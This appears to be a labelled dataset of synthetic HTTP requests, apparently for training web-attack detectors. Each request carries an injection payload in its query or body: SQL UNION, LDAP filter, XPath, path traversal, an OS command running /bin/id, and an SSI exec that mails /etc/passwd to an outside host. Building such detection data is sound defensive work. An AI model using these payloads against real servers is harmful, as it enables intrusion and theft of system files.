Date: Fri, 18 Nov 05 23:54:59 UTC
ETag: W/"N7G5r@ANdehaDXcp"
Max-Forwards: 2
Pragma: 4ner='2t'
Referer: http://www.it4tn.org/utuhel/ca0foen/aneites.avi
TE: gzip,trailers
User-Agent: melibymabO/3.6
UA-Disp: 684,6409,16
Via: 6.8 248.22.183.227, 8.8 www.osffetw.gif

null

End - Id: 44525
Start - Id: 37654
class: LdapInjection
POST /p5kjtposuiMl2uxgL/wyHb-Yn/include@I2TystdinESg/temEcjK-Ax@-Il/a_No8hf8aZ/mPhw2Xnpntgoq4ap3we/pwd/u7JO@0K3-YC.htm? HTTP/1.1
Content-Length: 228
Content-Language: Spnb
Content-Encoding: deflate
Content-Location: /rel7/shns4cUE/ka79tc/wrTem.mspx
Content-MD5: dDkzbHJscGl0cm9mc2VsYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 69.95.20.235
Connection: close
Accept: image/png;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity;q=0.6
Accept-Language: rciSg-Uau, iIieruob-7;q=0.9, q7i-iV;q=0.4
Cache-Control: no-transform
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="878"
Date: Thu, 26 May 05 07:40:25 CET
ETag: "I_BLdcsmr42mGnXLVLke"
Expect: 100-continue
From: p9ot@shsomno.org
If-Modified-Since: Tue, 29 Nov 05 17:14:32 CET
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: "r7MY7qmMKQfbKI0kE"
If-Range: Sat, 27 Aug 05 03:27:55 CET
Max-Forwards: 05
MIME-Version: 8.2
Pragma: ig='tgart'
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /i0h2hixt.bin
TE: chunked
Trailer: Accept
User-Agent: OMSIsvl9eocGoi
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 9.7 153.134.114.32, hi4ile/5.4 www.ggae.html:94
Transfer-Encoding: compress
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ortmniiad=1979&smelWspoalistw=/a:c&yHtfbocram=)( |    (abd=Smtrf*)&ma0lra=$sninput<&smcLlnnttmtrNo=koh&2id=laFeIth:dtraerI&7gDO5ALIch2=72917&lssaNtniolur=ToOsh2secu&eeatasrirt=it h2m\hosegy&nao=0653491582

End - Id: 37654
Start - Id: 35257
class: SqlInjection
GET /group by0Qm_/rJe8.exe?pet8=8bf_ieGrl-A&Sse1e5rn1diaOer=ohis&weoswieewn=eIaO&rh1owtttwipue=e-2LvU4MUq&ehhet=emusi&Hsemrqa=aeKaepseis&0egoweOmtIVrRa=replacegpsaitCe7snfteustnodeo%7E&iieieh=nrtmekrNed%27+UNION+++ALL+SELECT++bo5eeud6+++++FROM+++++enlzrryetR+WHERE+++++%27%27%3D+++%27&hsJnnh=ietts1NeyoF9&sa29lsNEe=1545&PHzCwj5S=bh3PKwa&eqUa=eot7oyvITeqxmlnetvu HTTP/1.1
Host: 58.155.141.17:6742
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Sun, 29 Jun 08 11:02:57 GMT
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Mon, 26 Oct 09 18:15:16 CET
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: Sun, 29 Jun 08 15:57:08 CET
Max-Forwards: 0272
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: NTLM dGVjYW9lM2FJZnRjYWhzZWVwaTNyZWdkZDR5YVR0NmFkaXI0b2JPc3NJYTI2bjF1
Range: 716-,83323-
Referer: /eoeo.dll
TE: chunked
Trailer: User-Agent
User-Agent: ptdlofh2x4/2.4.9.7.5
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: deflate
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 690 www.lipntex.shtml "aeisgIo7eETipoewea" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35257
Start - Id: 36856
class: LdapInjection
GET /e6wLC6_pK1WX/svpz7mmpGMX0za.jpeg?1fTrrfooyacv=31601&c1ldsstH6rszNn=r3f2amphp0teo&Wake=yAMLIQJ6-j&6Spinsert=ogetlE&2chtgf=%40%40iRoTiC8sl&n1n7ssp=%5Bl%2F%25zonCi%3C&9ensa=lrdNr%5Db&rno=28388272 HTTP/1.1
Host: 203.125.192.159:2753
Connection: 6yqnno
Accept: audio/*;q=0.1, audio/*, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ofwcT-hmhl
Cache-Control: no-transform
Client-ip: 146.228.96.174
Cookie: aHha=b ;deall nqsoZhta
Cookie2: $Version="83"
Date: Thu, 13 Jan 05 05:33:55 GMT
ETag: W/"5JML7FFin_UqpMqhuP"
Expect: 100-continue
From: lvelladt@3trbvtitH.net
If-Modified-Since: Sat, 10 Jul 04 04:35:06 CET
If-Unmodified-Since: Sat, 03 Oct 09 16:43:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 014
MIME-Version: 9.2
Pragma: no-cache
Authorization: NTLM aWFjbDRuOGZ0aGMyZWh5ZG90dGVlcmllZGJ2Y3luMXdvbmNlaWFTd21kZQ==
Range: 62221-7,-0
Referer: http://www.oibmnHcE.uk/eepvn/tyssxnh/0di8/deHaoie.gz
TE: chunked
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-CPU: MIPS
UA-Disp: 564,7539,32
UA-Color: color32
UA-Pixels: 6170x381
Via: Jah/4.9 23.115.128.21
Transfer-Encoding: identity
Warning: 684 204.159.228.94 "osfhtonymxe6" "Mon, 02 Oct 06 19:23:23 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36856
Start - Id: 35874
class: XPathInjection
GET /etceaarbuptes9p2a/nP/mk/axUiY9XMTvLBb/noBo_7Romr5Fxcw@HOKU/iCfJ5EcGuQb.mdb?wmpawchdd=icba%27++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i+++%2B++j++++%2Bk%2Bl%2B++++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27h1iuheA%27%3D++++%27+++esUyas%27++++or HTTP/1.1
Host: 137.89.224.252
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=606
Client-ip: 167.85.209.229
Cookie: 5tEwehBBL=25975;kyd2JByaX=800840;Z-._9e_.=Shatih3u4tot4t9a;sght0evCtId=enbin(uc8;olioeest=nwbrCXZmCyiv
Date: Tue, 09 May 06 21:08:11 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Sat, 01 Aug 09 08:16:26 UTC
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "iRj6VMbTsS6X_calJ-kD"
If-Range: "dqRxJoyWTa7pbqw4Ze"
Max-Forwards: 9
MIME-Version: 4.5
Pragma: vedr='ak4jtI'
Proxy-Authorization: Digest nonce
Authorization: dcxnx vuow=u1e0
Range: 440415-33194,1644-5
Referer: /EEeGoml/Neihrdtm/llTPtU9g/foeeod.wmn
TE: chunked
Trailer: If-Match
User-Agent: nncsn3tzmwStdolhnecu
UA-OS: Linux
UA-Color: color32
Via: 4sj/8.5 0.88.26.44:2, FTP/4.2 191.161.168.235, hpPnr/2.6 74.23.221.35:3
Transfer-Encoding: compress
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------

null

End - Id: 35874
Start - Id: 39174
class: SSI
PUT /Ub8oieqNs8linenti9dh/rvrhwNZivmbgXxdn_7QR/oeR/sqeqsssTa6snedhhajo/4p8dwvKhF9Lid1window.open/hljLdltbvecrnq/1jUpasswdzrGZVboot.iniL/XX@group by7fhttps5/e7trp.shtml? HTTP/1.1
Content-Length: 523
Content-Language: El4euou,cb
Content-Encoding: identity
Content-Location: http://www.ath5.org/0wrri/e0gH/gftee/ne7eexs.wav
Content-MD5: MHEwZWRld2hoMXllbTlydA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Nov 08 12:51:52 UTC
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: www.behqnziEpd.net:6
Connection: keep-alive
Accept: image/png;q=0.3, video/quicktime;q=0.0, video/mpeg
Accept-Charset: windows-1255;q=0.7, windows-1258;q=0.6
Accept-Encoding: identity;q=0.3, deflate, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 105.29.124.80
Cookie: APRYGreplaceV6udvL=alrgmocemuwmy3l;5c3HT=8;osdrocm7rserls=7th>drop;Vf==hwe
Date: Wed, 04 Nov 09 20:31:32 GMT
ETag: W/"2WXL7_HNCc1LU44Hf"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Thu, 04 Jan 07 02:13:17 CET
If-None-Match: *
If-Range: *
Max-Forwards: 171
MIME-Version: 3.6
Pragma: nsto='lisOtUgt'
Authorization: NTLM NG9vZW5FcGEzOGVudXpZb0tjdGV4bW10ZGJhZWloMXdmZWdMU2VjOXRi
Referer: http://www.m1tEinr.com/bhionyoh/9geaym2/reea.php
Trailer: Trailer
User-Agent: osns9fn (42daoNCQ; tuhE33-zP; t5BEAN11mZ; u4yQgvx6Kn; jF0aUs)
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: deflate
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

cFhaeedienat=$ze&oc5ms=<!--#email fromhost="www.rWwsts.com" tohost="mailbox.epa.com" message="tdtRjx sndy0a sHpwwcke eroIrw" fromaddress="trie.com" toaddress="uhi4.1Ol.com" subject="lc" sender="te.com" replyto="ihcdegc.com" cc="cs" inreplyto="Aah tTri Gle" id="moemail" -->&at=8004518&OrH4ryUEh=ly&fWApasswd0DDC=Xnta&euw=r8sselect0d&2kU7Pax_=3430&Hpall3bh=at&5es=4&tdrluriy9Lone8=aerees7fwinntrjeutlink&uuuIoAtn=2&xIwvbscriptE7X=scriptiif&4l6et=26

End - Id: 39174
Start - Id: 46403
class: PathTransversal
GET /4Rn30e/rXs/ebar/eelomEN4eHojefAgMe/m9/4wlivt7ansmhcroAo3Sg/1p/4ablogTAKQU.S8/vL5ZITqjAbF6V-oj.css?riheadona6x=7iiioetpeiEtyn4mf&K.vacceptr=tg4c&Ci9cnkhy7yrhae=%3Cn%29&hst7fsoaoism=ahavingoAooazpag&2gDOVG2=tgkopen&jUitsfhh=oeac6loi%29+3sep&5r4XUX=fidScntbinki&qur5=q0CBV-&eqptPhmaseTAtn=nrf&etsll2sc3tyt=9666253&naLfTilgazpX6o=820&riAuj2arc=zQL%40dddj.L&9dswuiyhez=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Frnd.conf HTTP/1.1
Host: 209.148.54.70
Connection: keep-alive
Accept: image/*, video/quicktime;q=0.3, text/html;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.1, gzip;q=0.3, compress, identity;q=0.1
Accept-Language: tatr1ua-aodn;q=0.2, tjgt6-stuhsn;q=0.2
Cache-Control: no-cache
Client-ip: 215.80.151.61
Cookie: chefhUed=Ehs>5ui=net -sdachild6da;EuG=rlocationeN;eMXaso8lonq6sn=thrlah];OL;mEmawoN=zecoli;t
Cookie2: $Version="7"
Date: Sat, 05 Apr 08 13:18:18 GMT
ETag: W/"AuAN-mgN8NIK-@ZSw.r"
Expect: MeyO2ooe
From: eitn@airwo.uk
If-Modified-Since: Mon, 02 Jan 06 13:40:34 UTC
If-Unmodified-Since: Sun, 07 Aug 05 06:16:05 UTC
If-Match: "jnL_ddsF5ggrN6p"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.5
Pragma: etel=IawchrR
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM ZWNyc2hIMWpkY250bnRmaGVlaFNiZTJmb2llZGRuMWU0
Range: 0-,-1441,-234089
Referer: http://iaraiq28.com/Casinn/tendi/errdnt/IwriDhwn.jsp
TE: gzip;q=0.2
Trailer: TE
User-Agent: hAHn3d63 http://www.raaw.com
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 999x039
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: identity
Upgrade: seiNru/4.4, heb/3.2, 9mib/3.3, wteE/3.5, roe/2.2
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46403
Start - Id: 40792
class: SSI
GET /nDtejahngsttnphk/5ixao/npofwBWmnnpd/Fapu/9djihTpuOXP.htm?nhu8tipiaeigae=%3C%21--++++%23odbc+++statement++++%3D+++%22select+++bev%2C+djtc8%2C++anF++from++++1r5s4qooy++++order+++by++++8%2C+07%2C+++5%22+--%3E&rbrEwpxoneD=tpMkczR8157f&sjvR8ins=60661&bCD8yuUXj1=70502356&azzrb3=dnogfer&rn=gcZTu&IT8Ubinsert0=rcpmo+&oapjeGtrr7oIxb=weE&Arkemg9OIhrnsxe=o%3F%5Ba HTTP/1.0
Host: www.teesjfRai.cz
Connection: keep-alive
Accept: text/plain
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate, deflate;q=0.1, deflate
Accept-Language: otoamtpl-esetgu;q=0.5, hL-oy;q=0.5
Cache-Control: no-cache
Client-ip: 79.174.208.245
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="363"
Date: Thu, 12 Aug 04 09:24:16 CET
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iipxpA@IasrDjh.ch
If-Modified-Since: Sat, 10 Oct 09 24:29:06 CET
If-Unmodified-Since: Tue, 14 Feb 06 10:19:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0301
MIME-Version: 2.9
Pragma: nnletWa='td2ea'
Proxy-Authorization: NTLM T3Zob2lzcW5lcmxidmVubnNpcmYzZGVmdGNyM3Vod2xvdGJs
Authorization: NTLM Y2lsZW1yb2lpckF0ZWFFUG9FMTY3ZVJkbmk0dGRpYWlkenBzcHJwa3JsYW5l
Range: 6294-616374
Referer: http://www.esf6d.gov/mtnhehs.cfm
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (compatible; ieuom; Open BSD i586; edysBaees)
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 4833x5333
Via: 4.5 58.181.255.60, FTP/3.6 38.208.94.120:492
Transfer-Encoding: identity
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40792
Start - Id: 37690
class: LdapInjection
POST /n8Wrvpkwgb/Rld5dteeWptath6q6u/8xP1vGTK1B9RceW5jXu/rJkBoRpr9QeuAf0/zyb/satmidesceShs/t90snceAsteoygnl6ih/B3d_QeLYHQpX/oft/uy64Rl5exud7Dnc0.htm? HTTP/1.1
Content-Length: 63
Content-Language: wN,iwp3,ut
Content-Encoding: compress
Content-Location: /linnjaq/ertqe.nsf
Content-MD5: YWZhaFluc3Rld3N0eUVBYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 10:41:37 UTC
Last-Modified: Sun, 02 Mar 08 02:12:41 CET
Host: www.s1yeiab1yw.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: Qnnke-wiDiwn;q=0.3, atHnw-taipdeoo, agH-48unu;q=0.1
Cache-Control: max-age=219
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="3"
Date: Sun, 19 Nov 06 12:34:01 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Wed, 21 Feb 07 03:37:58 CET
If-Unmodified-Since: Tue, 11 Jul 06 03:27:36 UTC
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: Mon, 08 Jan 07 05:23:20 GMT
Max-Forwards: 20
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 6058-6,88-,-245437
Referer: /pootNLt.txt
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.3 (Windows; U; WinNT 3.9; 4o-4t; rv:6.7.3) Gecko/91524407
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.7 www.Ejegowze.js
Transfer-Encoding: identity
Upgrade: 8tle/5.7
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

57c8jNetcdA@zO=cesvneliK8no&v4u-=)   (|  (odtn=na*)

End - Id: 37690
Start - Id: 43350
class: OsCommanding
GET /uewcs3zr/hrV.2s0LD-H@/ebxl4i/hty/fihmedcnee6gicf.jpeg?oieoHaallcuh=4826&_ceT=uH%40G.&2Suo5rl4eecig=naeP&tdmnnmrendsnt=rsi1reie4%40passthruNaetds&f1aps9hhrAUe=+l%26&shhodgeaxbt=l&gcvhi1pti=0DT&oybAothraayFgI=%5C%3B%5C%2Fbin%5C%2Fid++%3B HTTP/1.1
Host: 132.39.213.237
Connection: u37fix
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Sun, 05 Aug 07 06:37:54 GMT
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sun, 01 Apr 07 01:49:14 CET
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: "k8Ow660K2iP7Z1Taht4"
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: *
Max-Forwards: 74
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: Basic ZWhyb3RwaW86dHphM2w=
Range: -3
Referer: /oueh/jfihoem/j7tl/h0i0oA/nryR91.gif
TE: trailers,trailers
Trailer: Connection
User-Agent: geS16ArJU6 http://www.g9AYl.com
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: thyso/9.2 184.230.239.38, 2.2 50.121.243.139
Transfer-Encoding: compress
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43350
Start - Id: 40160
class: SSI
GET /oiX3OC/aEyEDW.WOh4V/ebee/5_k9/tUKTeZ0RGA4dFIp/cAJ8lNMI6.shtml?hemE=FtennenigtOnye&I9=mJfahr%2Beli+ol&jncsaqdo3eiadC=1318680264&7ehanny=nFCJ60L7f&QAwinnt78t3=Inc6eotietob%29rr&a3cyxl=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fmail++++ht2kpi.com++%3C+%2Fetc%2Fpasswd%22--%3E&1ooeYresl2ukew=0021&Hrz=aiyusracfw&Ose2=dB_FzAu HTTP/1.1
Host: 118.54.130.132
Connection: close
Accept: text/plain, video/mpeg, audio/*
Accept-Charset: x-mac-cyrillic;q=0.8, iso-8859-8-i;q=0.9, iso-8859-2, ks_c_5601-1987
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 12.182.155.135
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Tue, 12 Feb 08 16:59:02 UTC
ETag: W/"fwPq9i.9FDenawS"
Expect: 5orn=slar
From: stce@ygsk.st
If-Modified-Since: Mon, 23 Feb 09 15:22:16 UTC
If-Unmodified-Since: Thu, 15 Dec 05 05:55:51 UTC
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: ytbe8 eo2t=gnnhede
Range: 728-,7-688430
Referer: /efdRuwac/ctiolTl/cwddtein.js
TE: gzip
Trailer: Warning
User-Agent: Mozilla/6.5 (compatible; MSIE 3.9; WinNT; hfitawt6e; iesiUge; defeDhhlrc)
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40160
Start - Id: 41630
class: SqlInjection
GET /sJ3ncmd/do/hNoatif49ucen65e/Ngrlfpsi89h/qTiewalug/o0t/ihcsw.png?yean6Rhsse=53&le=%27+AND+++++USER_NAME%28%29%3D%27gutst&6eoIrteEet=483279645 HTTP/1.0
Host: www.aeoOh.biz
Connection: N9araiup
Accept: */*;q=0.5
Accept-Charset: koi8-r;q=0.8, iso-8859-9, iso-8859-3;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=332
Client-ip: 203.175.117.190
Cookie: yTlobR=deDletofsjnoiedlna;v95wu=153658160;lDeihtwiudnac=s=;dnrtk3saninlO=tAmryea;Hmidgo3=9Ido%uiasIey@At;ui=co9bd4ZJal
Cookie2: $Version="003"
Date: Mon, 27 Mar 06 17:48:59 CET
ETag: W/"LQFO4hCK5wqIuHc"
Expect: dSei2edr=aNexTn
From: enlbuaah@iDob1m.fr
If-Modified-Since: Mon, 23 Apr 07 11:46:14 CET
If-Unmodified-Since: Tue, 07 Sep 04 15:14:04 UTC
If-Match: "ANlUb@68rpGQSJn"
If-None-Match: *
If-Range: Tue, 18 Apr 06 24:05:08 GMT
Max-Forwards: 2
MIME-Version: 5.2
Pragma: mkghh3g='n'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: ssie yaaeoe=aiei3
Range: 53962-110288
Referer: http://ssseE.it/meth/0ltesm/eceoa8Iv/treof/ranmwSea.sh
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/8.8 (X11; U; Solaris 8.9; wq-eh; rv:2.8.5) Gecko/74880072
UA-CPU: Sparc
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: compress
Upgrade: 8mMtyc/5.9, rieeOg/1.0
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41630
Start - Id: 35724
class: XPathInjection
GET /y6pc9LREdrVBTY93Zna/DuG-v_ZmJMsd/evZoH/gfotiAalvhlba/dphaaI/f7eluaraoxVtg11xwheh/etaiaufvhaInli7rtm/selectLu6CIcopy45yC/Vx/UItrtilin3aoaRcU0Old/IMe5sX4nDA2M/datTiCsAntgst.htm?3hhuadwcC=591248257&4eyunETrycpthp=wrgiMpiho&i4=Eo5r%27++++or+++++%28i+++%3C++++count%28qs%2Fchild%3A%3Atext%28%29%29++++and++j+++++%3C++count%28ny0ps%2Fchild%3A%3Acomment%28%29%29+++and+++k++++%3C+++++count%28uDyylt%2Fchild%3A%3A*%29+++%29+or+++++%27iluien%27+%3D%27+++exln%27++or HTTP/1.1
Host: www.tau7ncsna.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesetrad;q=0.3, ks_c_5601-1987, iso-8859-6
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=44174
Client-ip: 18.203.213.243
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
Date: Sun, 14 Sep 08 04:25:04 GMT
ETag: "qY1F1gA6Xdx_fn-fmH4"
Expect: ois81Er
From: nptt@ai166.st
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Sat, 26 Jul 08 21:07:57 GMT
If-Match: *
If-None-Match: "N8Rl0q3M@bsRK8MQ"
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 89
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM M2VhcnhuSGFsNG83MHNvY2lpYXdhemxwT2VzcnJkbGNuc2dhaWxzbmU=
Range: -0128,0-7163
Referer: http://www.an1t.st/tUetnTdo/niicp/slhrn/ysAeoo.swf
TE: trailers,deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/5.5 (compatible; MSIE 3.4; Unix; othM1nm; ybhxusop; tsv9)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: 9.1 www.oiso8v.shtml, 9.8 192.100.75.153
Transfer-Encoding: deflate
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35724
Start - Id: 37878
class: LdapInjection
GET /toV-udwfPpQyDkEc/Zcqr.xMAEsU84g/llwccoeoiuldHhntweEo/hUVO-9wawaTYpLyrFS/iievaeemeO/t_IBM0vx.XG7@6An5-HV/oin/49feotbnsn/qhtDaatsog0Goeal/syBpVHP4nc/cdMc4n.o/hf.html?ebrae=581175324&ongojesyni=102276&O_myLsdvAtL=1886%29%28%26%28objectClass%3Donr%29%28%7C%28sn++++%3Dawi%29%28cn%3D4+++++J*%29%29&twenysoasnx=3794717915&sn=df6vqFcggE31&5D=en&ekeY1er9Enod=rt+&6Ueo4=58990&SkexecyY3HallformG=iwl2raj2lzeithnesm HTTP/1.0
Host: 177.163.13.222
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5sSQe-g;q=0.1, lex-eso;q=0.8, aldie-etcdtm;q=0.1, 2rmlausz-f;q=0.5, f-ssla
Cache-Control: max-age=7240
Client-ip: 243.107.176.204
